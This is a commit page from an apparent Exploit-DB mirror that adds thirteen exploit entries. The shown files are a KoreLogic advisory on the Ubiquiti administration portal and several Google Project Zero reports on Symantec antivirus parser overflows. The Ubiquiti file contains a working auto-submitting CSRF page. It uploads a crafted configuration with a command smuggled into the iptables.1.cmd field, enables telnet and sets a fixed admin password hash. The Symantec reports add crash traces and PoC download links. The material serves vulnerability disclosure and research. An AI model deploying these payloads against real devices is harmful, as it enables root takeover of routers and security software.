bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-06-30

Browse source 
13 new exploits

Symantec Antivirus - Multiple Remote Memory Corruption Unpacking RAR
Symantec Antivirus - Remote Stack Buffer Overflow in dec2lha Library
Symantec Antivirus - Heap Overflow Modifying MIME Messages
Symantec Antivirus - Integer Overflow in TNEF Decoder
Symantec Antivirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink
Symantec Antivirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow
Windows 7 SP1 x86 - Privilege Escalation (MS16-014)
Lenovo ThinkPad - System Management Mode Arbitrary Code Execution Exploit
Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities
WordPress Ultimate Membership Pro Plugin 3.3 - SQL Injection
Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution
Ubiquiti Administration Portal - CSRF to Remote Command Execution
Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion
This commit is contained in:
Offensive Security 2016-06-30 05:05:39 +00:00
parent 94e65060ad
commit f74a7dfb7e
14 changed files with 1730 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
files.csv
View file

@ -36204,3 +36204,16 @@ id,file,description,date,author,platform,type,port
40028,platforms/php/webapps/40028.txt,"Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities",2016-06-27,Security-Assessment.com,php,webapps,443
40029,platforms/lin_x86-64/shellcode/40029.c,"Linux x86_64 /etc/passwd File Sender Shellcode",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
40030,platforms/json/webapps/40030.py,"Untangle NGFW 12.1.0 beta - execEvil() Command Injection",2016-06-28,"Matt Bush",json,webapps,80
40031,platforms/multiple/dos/40031.txt,"Symantec Antivirus - Multiple Remote Memory Corruption Unpacking RAR",2016-06-29,"Google Security Research",multiple,dos,0
40032,platforms/multiple/dos/40032.txt,"Symantec Antivirus - Remote Stack Buffer Overflow in dec2lha Library",2016-06-29,"Google Security Research",multiple,dos,0
40034,platforms/multiple/dos/40034.txt,"Symantec Antivirus - Heap Overflow Modifying MIME Messages",2016-06-29,"Google Security Research",multiple,dos,0
40035,platforms/multiple/dos/40035.txt,"Symantec Antivirus - Integer Overflow in TNEF Decoder",2016-06-29,"Google Security Research",multiple,dos,0
40036,platforms/multiple/dos/40036.txt,"Symantec Antivirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",multiple,dos,0
40037,platforms/multiple/dos/40037.txt,"Symantec Antivirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0
40039,platforms/win32/local/40039.cpp,"Windows 7 SP1 x86 - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win32,local,0
40040,platforms/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution Exploit",2016-06-29,Cr4sh,windows,local,0
40041,platforms/php/webapps/40041.txt,"Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities",2016-06-29,hyp3rlinx,php,webapps,8445
40042,platforms/php/webapps/40042.php,"WordPress Ultimate Membership Pro Plugin 3.3 - SQL Injection",2016-06-29,wp0Day.com,php,webapps,80
40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0
40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - CSRF to Remote Command Execution",2016-06-29,KoreLogic,cgi,webapps,443
40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80

Can't render this file because it is too large.

482
platforms/cgi/webapps/40044.html Executable file
View file

@ -0,0 +1,482 @@
<!--
KL-001-2016-002 : Ubiquiti Administration Portal CSRF to Remote Command Execution
Title: Ubiquiti Administration Portal CSRF to Remote Command Execution
Advisory ID: KL-001-2016-002
Publication Date: 2016.06.28
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-002.txt
1. Vulnerability Details
Affected Vendor: Ubiquiti
Affected Product: AirGateway, AirFiber, mFi
Affected Version: 1.1.6, 3.2, 2.1.11
Platform: Embedded Linux
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF);
CWE-77: Improper Neutralization of Special Elements
used in a Command ('Command Injection')
Impact: Arbitrary Code Execution
Attack vector: HTTP
2. Vulnerability Description
The Ubiquiti AirGateway, AirFiber and mFi platforms feature
remote administration via an authenticated web-based portal.
Lack of CSRF protection in the Remote Administration Portal,
and unsafe passing of user input to operating system commands
exectuted with root privileges, can be abused in a way that
enables remote command execution.
3. Technical Description
The firmware files analyzed were
AirGWP.v1.1.6.28062.150731.1520.bin, AF24.v3.2.bin, and
firmware.bin respectively.
The MD5 hash values for the vulnerable files served by the
administration portal are:
AirGateway b45fe8e491d62251f0a7a100c636178a /usr/www/system.cgi
AirFiber d8926f7f65a2111f4036413f985082b9 /usr/www/system.cgi
mFi 960e8f6e507b227dbc4b65fc7a7036bc /usr/www/system.cgi
The firmware file contains a LZMA compressed, squashfs
partition. The binaries running on the embedded device are
compiled for a MIPS CPU. The device can be easily virtualized
using QEMU:
Example: sudo /usr/sbin/chroot . ./qemu-mips-static /usr/sbin/lighttpd
-f /etc/lighttpd/lighttpd.conf
The administration portal does not issue a randomized CSRF
token either per session, page, or request. Administration
authorization is solely based on cookie control. Therefore,
it is possible to embed JavaScript into an HTML page so when
an administrator is socially engineered into visiting the page,
the target device will be accessed with privileges.
Device configuration POST parameters include tokens passed to
operating system commands run as root in unsafe ways with
insufficient input sanitization. Command injection is possible
by stacking shell commands in parameters such as
iptables.1.cmd.
In order for a developer to recreate this discovery, the
following instructions should be duplicated.
a. Authenticate to the target web application and navigate to the
SYSTEM page.
b. Download the current configuration.
c. Open the configuration in an editor of your choice, navigate to the
line containing: iptables.1.cmd=-A FIREWALL -j ACCEPT
d. Append the following onto that line: ;touch /var/tmp/csrf-to-rce.txt
e. Save the changes, and submit the modified configuration. Apply the
changes using apply.cgi afterward.
Example:
POST /system.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0)
Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;
q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://192.168.1.1/system.cgi
Cookie: ui_language=en_US; last_check=1452020493426;
AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------4384928471732886672453075690
Content-Length: 7204
...
iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/tmp/csrf-to-rce.txt
...
GET /apply.cgi?testmode=&_=[redacted] HTTP/1.1
Host: 192.168.1.1
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.1/system.cgi
Cookie: ui_language=en_US; last_check=1452020493426;
AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
Connection: keep-alive
f. Change your IP address, but ensure continued routing to the target web
application. Incrementing the last octet is sufficient.
g. Open the configuration in an editor of your choice, navigate to the
modified line and alter it: ;touch /var/tmp/csrf-to-rce-newsrc.txt
h. Repeat step 5 from the new IP address. You will receive the same
response. Apply the changes using the apply.cgi file.
i. Login to the target device using SSH or telnet, navigate to /var/tmp
and type ls.
j. You'll discover both files exist.
4. Mitigation and Remediation Recommendation
At this time there is no vendor patch for this vulnerability.
The vendor was unable or unwilling to communicate an expected release
date for a proper mitigation.
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2016.02.25 - KoreLogic sends vulnerability report and PoC to Ubiquiti.
2016.02.26 - Ubiquiti acknowledges receipt of vulnerability report.
2016.04.12 - 30 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.04.21 - KoreLogic asks for an update on the remediation effort.
2016.04.29 - Ubiquiti replies that the patch will require
"significant changes" but does not provide an estimate
of the release time table.
2016.05.04 - 45 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.05.12 - KoreLogic requests an update from Ubiquiti.
2016.05.23 - KoreLogic requests an update from Ubiquiti.
2016.06.23 - 80 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.06.28 - Public disclosure.
7. Proof of Concept
########################################################################
#
# Copyright 2016 KoreLogic Inc., All Rights Reserved.
#
# This proof of concept, having been partly or wholly developed
# and/or sponsored by KoreLogic, Inc., is hereby released under
# the terms and conditions set forth in the Creative Commons
# Attribution Share-Alike 4.0 (United States) License:
#
# http://creativecommons.org/licenses/by-sa/4.0/
#
#######################################################################*
This example has been performed against the AirGateway device running the
1.1.6 firmware version. In order to recreate this vulnerability on
AirFiber and mFi, the attacker should first obtain a valid copy of the
device configuration and update this proof-of-concept code.
-->
<html>
<body>
<form action="https://192.168.1.1/apply.cgi" id="airos-exploit-apply">
<input type="submit" value="Submit request" />
</form>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://192.168.1.1/system.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------761818923593135447208368355");
xhr.withCredentials = true;
var body = "-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"fwfile\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"fwupload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"update_status\"\r\n" +
"\r\n" +
"enabled\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"hostname\"\r\n" +
"\r\n" +
"airGateway\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"timezone\"\r\n" +
"\r\n" +
"GMT\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"ui_language\"\r\n" +
"\r\n" +
"en_US\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"adminname\"\r\n" +
"\r\n" +
"ubnt\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"latitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"longitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"longitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"cfgfile\"; filename=\"hacked.cfg\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"aaa.1.radius.acct.1.status=disabled\n" +
"wpasupplicant.status=disabled\n" +
"wpasupplicant.device.1.status=disabled\n" +
"wireless.status=enabled\n" +
"wireless.1.wds.status=disabled\n" +
"wireless.1.wds.6.peer=\n" +
"wireless.1.wds.5.peer=\n" +
"wireless.1.wds.4.peer=\n" +
"wireless.1.wds.3.peer=\n" +
"wireless.1.wds.2.peer=\n" +
"wireless.1.wds.1.peer=\n" +
"wireless.1.status=enabled\n" +
"wireless.1.ssid=www.ubnt.com\n" +
"wireless.1.security.type=none\n" +
"wireless.1.scan_list.status=disabled\n" +
"wireless.1.mac_acl.policy=allow\n" +
"wireless.1.mac_acl.status=disabled\n" +
"wireless.1.hide_ssid=disabled\n" +
"wireless.1.devname=ath0\n" +
"wireless.1.autowds=disabled\n" +
"wireless.1.authmode=1\n" +
"wireless.1.ap=\n" +
"wireless.1.addmtikie=enabled\n" +
"vlan.status=disabled\n" +
"users.status=enabled\n" +
"users.1.status=enabled\n" +
"users.1.password=VvpvCwhccFv6Q\n" +
"users.1.name=ubnt\n" +
"upnpd.devname=\n" +
"upnpd.status=disabled\n" +
"tshaper.status=disabled\n" +
"telnetd.status=enabled\n" +
"telnetd.port=23\n" +
"system.modules.blacklist.status=disabled\n" +
"system.eirp.status=disabled\n" +
"system.cfg.version=65542\n" +
"syslog.status=disabled\n" +
"syslog.remote.status=\n" +
"sshd.status=enabled\n" +
"sshd.port=22\n" +
"sshd.auth.passwd=enabled\n" +
"snmp.status=disabled\n" +
"route.1.devname=eth0\n" +
"route.1.status=disabled\n" +
"route.1.comment=\n" +
"route.1.gateway=0.0.0.0\n" +
"route.1.netmask=0\n" +
"route.1.ip=0.0.0.0\n" +
"route.status=enabled\n" +
"resolv.nameserver.2.status=enabled\n" +
"resolv.nameserver.2.ip=\n" +
"resolv.nameserver.1.status=enabled\n" +
"resolv.nameserver.1.ip=\n" +
"resolv.status=disabled\n" +
"radio.status=enabled\n" +
"radio.countrycode=840\n" +
"radio.1.txpower=18\n" +
"radio.1.subsystemid=0xe4c2\n" +
"radio.1.status=enabled\n" +
"radio.1.reg_obey=disabled\n" +
"radio.1.rate.mcs=7\n" +
"radio.1.rate.auto=enabled\n" +
"radio.1.obey=disabled\n" +
"radio.1.mode=master\n" +
"radio.1.mcastrate=\n" +
"radio.1.low_txpower_mode=disabled\n" +
"radio.1.ieee_mode=11nght20\n" +
"radio.1.freq=0\n" +
"radio.1.forbiasauto=1\n" +
"radio.1.dfs.status=enabled\n" +
"radio.1.devname=ath0\n" +
"radio.1.cwm.mode=0\n" +
"radio.1.cwm.enable=0\n" +
"radio.1.countrycode=840\n" +
"radio.1.clksel=1\n" +
"radio.1.chanshift=\n" +
"radio.1.chanbw=0\n" +
"radio.1.antenna.id=4\n" +
"radio.1.acktimeout=25\n" +
"radio.1.ackdistance=600\n" +
"pwdog.status=enabled\n" +
"pwdog.retry=3\n" +
"pwdog.period=300\n" +
"pwdog.host=8.8.8.8\n" +
"pwdog.delay=300\n" +
"ppp.status=disabled\n" +
"ntpclient.status=enabled\n" +
"ntpclient.1.status=enabled\n" +
"ntpclient.1.server=0.ubnt.pool.ntp.org\n" +
"netmode=soho\n" +
"netconf.5.up=enabled\n" +
"netconf.5.hwaddr.mac=\n" +
"netconf.5.hwaddr.status=disabled\n" +
"netconf.5.autoip.status=disabled\n" +
"netconf.5.role=mlan\n" +
"netconf.5.mtu=1500\n" +
"netconf.5.devname=eth0\n" +
"netconf.5.status=disabled\n" +
"netconf.4.up=enabled\n" +
"netconf.4.netmask=255.255.255.0\n" +
"netconf.4.ip=0.0.0.0\n" +
"netconf.4.hwaddr.mac=\n" +
"netconf.4.hwaddr.status=disabled\n" +
"netconf.4.autoip.status=disabled\n" +
"netconf.4.role=bridge_port\n" +
"netconf.4.mtu=1500\n" +
"netconf.4.devname=eth1\n" +
"netconf.4.status=enabled\n" +
"netconf.3.up=enabled\n" +
"netconf.3.netmask=255.255.255.0\n" +
"netconf.3.ip=192.168.1.1\n" +
"netconf.3.hwaddr.mac=\n" +
"netconf.3.hwaddr.status=disabled\n" +
"netconf.3.autoip.status=disabled\n" +
"netconf.3.role=lan\n" +
"netconf.3.mtu=1500\n" +
"netconf.3.devname=br0\n" +
"netconf.3.status=enabled\n" +
"netconf.2.up=enabled\n" +
"netconf.2.promisc=enabled\n" +
"netconf.2.netmask=255.255.255.0\n" +
"netconf.2.ip=0.0.0.0\n" +
"netconf.2.hwaddr.mac=\n" +
"netconf.2.hwaddr.status=disabled\n" +
"netconf.2.autoip.status=disabled\n" +
"netconf.2.role=bridge_port\n" +
"netconf.2.mtu=1500\n" +
"netconf.2.devname=ath0\n" +
"netconf.2.status=enabled\n" +
"netconf.1.up=enabled\n" +
"netconf.1.promisc=enabled\n" +
"netconf.1.netmask=255.255.255.0\n" +
"netconf.1.ip=0.0.0.0\n" +
"netconf.1.hwaddr.mac=\n" +
"netconf.1.hwaddr.status=disabled\n" +
"netconf.1.autoip.status=disabled\n" +
"netconf.1.role=wan\n" +
"netconf.1.mtu=1500\n" +
"netconf.1.devname=eth0\n" +
"netconf.1.status=enabled\n" +
"netconf.status=enabled\n" +
"iptables.sys.upnpd.devname=\n" +
"iptables.sys.upnpd.status=disabled\n" +
"iptables.sys.status=enabled\n" +
"iptables.sys.portfw.status=disabled\n" +
"iptables.sys.mgmt.status=disabled\n" +
"iptables.sys.masq.1.status=enabled\n" +
"iptables.sys.masq.1.devname=eth0\n" +
"iptables.sys.masq.status=enabled\n" +
"iptables.sys.fw.status=disabled\n" +
"iptables.sys.dmz.status=disabled\n" +
"iptables.1.comment=\n" +
"iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/hacked.txt\n" +
"iptables.1.status=enabled\n" +
"iptables.status=enabled\n" +
"igmpproxy.status=enabled\n" +
"igmpproxy.upstream.devname=eth0\n" +
"igmpproxy.1.downstream.devname=br0\n" +
"httpd.status=enabled\n" +
"httpd.session.timeout=900\n" +
"httpd.port=80\n" +
"httpd.https.status=enabled\n" +
"httpd.https.port=443\n" +
"gui.wlan.advanced.status=disabled\n" +
"gui.network.advanced.status=enabled\n" +
"ebtables.sys.vlan.status=disabled\n" +
"ebtables.sys.status=enabled\n" +
"ebtables.sys.eap.status=disabled\n" +
"ebtables.sys.eap.1.status=enabled\n" +
"ebtables.sys.eap.1.devname=ath0\n" +
"ebtables.sys.arpnat.status=disabled\n" +
"ebtables.sys.arpnat.1.status=enabled\n" +
"ebtables.sys.arpnat.1.devname=ath0\n" +
"ebtables.status=enabled\n" +
"dyndns.status=disabled\n" +
"dnsmasq.status=disabled\n" +
"dnsmasq.1.status=disabled\n" +
"dnsmasq.1.devname=eth0\n" +
"discovery.status=enabled\n" +
"discovery.cdp.status=enabled\n" +
"dhcpd.1.start=192.168.1.2\n" +
"dhcpd.1.netmask=255.255.255.0\n" +
"dhcpd.1.lease_time=600\n" +
"dhcpd.1.end=192.168.1.254\n" +
"dhcpd.1.dnsproxy=enabled\n" +
"dhcpd.1.devname=br0\n" +
"dhcpd.1.dns.2.status=disabled\n" +
"dhcpd.1.dns.2.server=\n" +
"dhcpd.1.dns.1.status=disabled\n" +
"dhcpd.1.dns.1.server=\n" +
"dhcpd.1.status=enabled\n" +
"dhcpd.status=enabled\n" +
"dhcpc.1.status=enabled\n" +
"dhcpc.1.fallback_netmask=255.255.255.0\n" +
"dhcpc.1.fallback=192.168.10.1\n" +
"dhcpc.1.devname=eth0\n" +
"dhcpc.status=enabled\n" +
"bridge.1.fd=1\n" +
"bridge.1.comment=\n" +
"bridge.1.port.2.devname=eth1\n" +
"bridge.1.port.2.status=enabled\n" +
"bridge.1.port.1.devname=ath0\n" +
"bridge.1.port.1.status=enabled\n" +
"bridge.1.stp.status=disabled\n" +
"bridge.1.devname=br0\n" +
"bridge.1.status=enabled\n" +
"bridge.status=enabled\n" +
"aaa.status=disabled\n" +
"aaa.1.status=disabled\n" +
"aaa.1.radius.macacl.status=disabled\n" +
"aaa.1.radius.auth.1.status=disabled\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"cfgupload\"\r\n" +
"\r\n" +
"Upload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"cfgupload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"systemdate\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
document.getElementById("airos-exploit-apply").submit();
</script>
</body>
</html>
<!--
The contents of this advisory are copyright(c) 2016
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->

60
platforms/multiple/dos/40031.txt Executable file
View file

@ -0,0 +1,60 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=810
A major component of the Symantec Antivirus scan engine is the "Decomposer", responsible for unpacking various archive formats such as ZIP, RAR, and so on. The decomposer runs as NT AUTHORITY\SYSTEM on Windows, and root on Linux and Mac. It is self-evident from looking at the decomposer code that Symantec have based the RAR decompression on the open-source unrar package from RAR labs (Note: this is permitted by the unrar license).
By comparing Symantec's code to the open source code, I have determined that Symantec are probably using version 4.1.4 of the unrar code, released in January 2012. The most current version is version 5.3.11.
Between the version of unrar that Symantec runs as NT AUTHORITY\SYSTEM to unpack untrusted binaries received over the network and the the current version, literally hundreds of critical memory corruption bugs have been resolved.
I have verified that multiple publicly known vulnerabilities affect Symantec, and can result in remote code execution as NT AUTHORTITY\SYSTEM on Windows and root on Linux and Mac.
I have verified this on the following products:
Norton Antivirus, Windows
Symantec Endpoint Protection, Linux and Windows
Symantec Scan Engine, Linux and Windows
Presumably this affects all other Symantec products using the core Symantec scan engine.
In my opinion, I'm being exceptionally generous considering this issue a new vulnerability and not public information. Frankly, it is astonishing that Symantec do not track new releases of third party code they use. I think you should take this opportunity to check all other third party code you're using to verify you haven't fallen behind.
I've attached a trivial example that modifies an arbitrary index in the PlaceA[] array via Unpack::ShortLZ().
(534.adc): Access violation - code c0000005 (!!! second chance !!!)
eax=14858d00 ebx=07da63e0 ecx=07da65ec edx=fb6e43a0 esi=07da6370 edi=daf72217
eip=6d7b4016 esp=0da8d260 ebp=0da8d27c iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
ccScanw!filelengthi64+0x470b6:
6d7b4016 8994be005d0000 mov dword ptr [esi+edi*4+5D00h],edx ds:002b:73b748cc=14858d00
0:052> lm v mccScanw
start end module name
6d690000 6d8bf000 ccScanw (export symbols) C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Loaded symbol image file: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image name: ccScanw.dll
Timestamp: Tue Jan 26 13:51:55 2016 (56A7EA7B)
CheckSum: 0022B3ED
ImageSize: 0022F000
File version: 13.1.2.19
Product version: 13.1.2.19
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Symantec Corporation
ProductName: Symantec Security Technologies
InternalName: ccScan
OriginalFilename: CCSCAN.DLL
ProductVersion: 13.1.2.19
FileVersion: 13.1.2.19
FileDescription: Symantec Scan Engine
LegalCopyright: Copyright (c) 2015 Symantec Corporation. All rights reserved.
These bugs are obviously exploitable for remote code execution on all Symantec customer machines as root or SYSTEM.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40031.zip

41
platforms/multiple/dos/40032.txt Executable file
View file

@ -0,0 +1,41 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=814
The dec2lha library is the library responsible for decompressing LZH and LHA archives. The CSymLHA::get_header() routine has a trivial stack buffer overflow.
.text:00023D91 31 C0 xor eax, eax
...
.text:00023DAE 8D 95 E4 FB FF+ lea edx, [ebp+var_41C]
.text:00023DB4 89 D7 mov edi, edx
.text:00023DC7 66 B9 00 01 mov cx, 100h
.text:00023DCB F3 AB rep stosd
We can see from this initialization that var_141C is a 1024 byte stack buffer, because 0x100 * sizeof(dword) = 1024. But later on in this routine:
.text:0002442C 88 0C 10 mov [eax+edx], cl ; eax = &var_41C edx=index
.text:0002442F 83 C2 01 add edx, 1 ; edx++
...
.text:00024408 81 FA 00 10 00+ cmp edx, 1000h ; if (index > 4096) ...
.text:0002440E 0F 84 E9 02 00+ jz loc_246FD ; oob
The index is checked to see if it's > 4096 bytes, this is incorrect. This is most likely a simple programmers error, bounds checking with the wrong size.
This code is typically run with SYSTEM/root privileges, I'm using Symantec Scan Engine on Linux to reproduce this issue, but all platforms and products using this code (e.g. Symantec Mail Security) are likely affected.
#0 0xf5606d95 in CSymLHA::get_header(SymLHA::_S_LzHeader*) () from libdec2lha.so
#1 0xf5607af4 in CSymLHA::GetEntry(SymLHA::_S_LzHeader*) () from libdec2lha.so
#2 0xf55e83d5 in CLHAEngine::ProcessChildren(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, CSymLHA*) () from libdec2lha.so
#3 0xf55e8a8f in CLHAEngine::Process(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, bool*, bool*) () from libdec2lha.so
#4 0xf5c137b5 in CDecomposer::DecProcess(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
#5 0xf5c143cb in CDecomposer::Process(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
(gdb) c
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
Because Symantec do not use -fstack-protector on Linux, exploitation is remarkably trivial. Exploitation is likely still possible on Windows, but may be more difficult as they do use /GS on that platform.
This issue is remotely exploitable just by receiving an email, visiting a website, and so on.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40032.zip

28
platforms/multiple/dos/40034.txt Executable file
View file

@ -0,0 +1,28 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=818
Symantec attempts to clean or remove components from archives or other multipart containers that they detect as malicious. The code that they use to remove components from MIME encoded messages in CMIMEParser::UpdateHeader() assumes that filenames cannot be longer than 77 characters.
This assumption is obviously incorrect, names can be any length, resulting in a very clean heap overflow.
The heap overflow occurs because Symantec does the cleaning in multiple stages, first changing the Content-Type to "text/plain", then changing the filename to "DELETED.TXT". The problem is that during the first stage of this process, they maintain the existing name but use a buffer prepared for the final name.
Something like:
char *buf = malloc(strlen(NewContentType) + strlen(LengthOfNewEncodedFilename) + 100)
// First change the content-type
strcpy(buf, "Content-Type: ");
strcpy(buf, NewContentType;
strcpy(buf, "; name=\"");
strcpy(buf, OldFileName);
...
UpdateName(buf, NewFileName);
...
This obviously won't work, because it doesn't verify that the old name will fit. I've attached an example MIME message that triggers this code in Symantec Scan Engine.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40034.zip

31
platforms/multiple/dos/40035.txt Executable file
View file

@ -0,0 +1,31 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=819
Simple fuzzing found an integer overflow in the dec2tnef library. This allocation from Attachment::setDataFromAttachment() doesn't verify that the attacker controlled value doesn't wrap:
.text:000227B8 8D 42 01 lea eax, [edx+1]
.text:000227BB 89 85 68 FF FF+ mov [ebp+var_98], eax
.text:000227C1 8B 83 CC FF FF+ mov eax, ds:(_ZSt7nothrow_ptr - 42CFCh)[ebx]
.text:000227C7 89 44 24 04 mov [esp+4], eax
.text:000227CB 8B 85 68 FF FF+ mov eax, [ebp+var_98]
.text:000227D1 C1 E0 02 shl eax, 2
.text:000227D4 89 04 24 mov [esp], eax
.text:000227D7 89 95 5C FF FF+ mov [ebp+src], edx
.text:000227DD 89 8D 58 FF FF+ mov [ebp+var_A8], ecx
.text:000227E3 E8 54 22 FE FF call __ZnajRKSt9nothrow_t ; operator new[](uint,std::nothrow_t const&)
That's (count + 1) * 4, without any checking that will succeed. The attached testcase reaches this code on Symantec Scan Engine, I'm not sure which other products use this code.
(gdb) bt
#1 0x07e88816 in Attachment::setDataFromAttachment(Item&) () from definitions/Decomposer/libdec2tnef.so
#2 0x07e88abc in Attachment::setAttribute(Item&) () from definitions/Decomposer/libdec2tnef.so
#3 0x07e8a1b4 in TNEFObject::getAttachments(_IO_FILE*, MList&) () from definitions/Decomposer/libdec2tnef.so
#4 0x07e6c1d6 in CTNEFArchive::Open(char const*) () from definitions/Decomposer/libdec2tnef.so
#5 0x07e6ae5f in CTNEFEngine::OpenArchive(CTNEFArchive*, bool*) () from definitions/Decomposer/libdec2tnef.so
#6 0x07e6b8c0 in CTNEFEngine::Process(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, bool*, bool*) () from definitions/Decomposer/libdec2tnef.so
#7 0x063d07b5 in CDecomposer::DecProcess(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
#8 0x063d13cb in CDecomposer::Process(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40035.zip

56
platforms/multiple/dos/40036.txt Executable file
View file

@ -0,0 +1,56 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=821
A major component of the Symantec Antivirus scan engine is the "Decomposer", responsible for unpacking various archive formats such as ZIP, RAR, and so on. The decomposer runs as NT AUTHORITY\SYSTEM on Windows, and root on Linux and Mac. Simple fuzzing of zip archives discovered missing bounds checks in the routine ALPkOldFormatDecompressor::UnShrink, used to decode Zip archives.
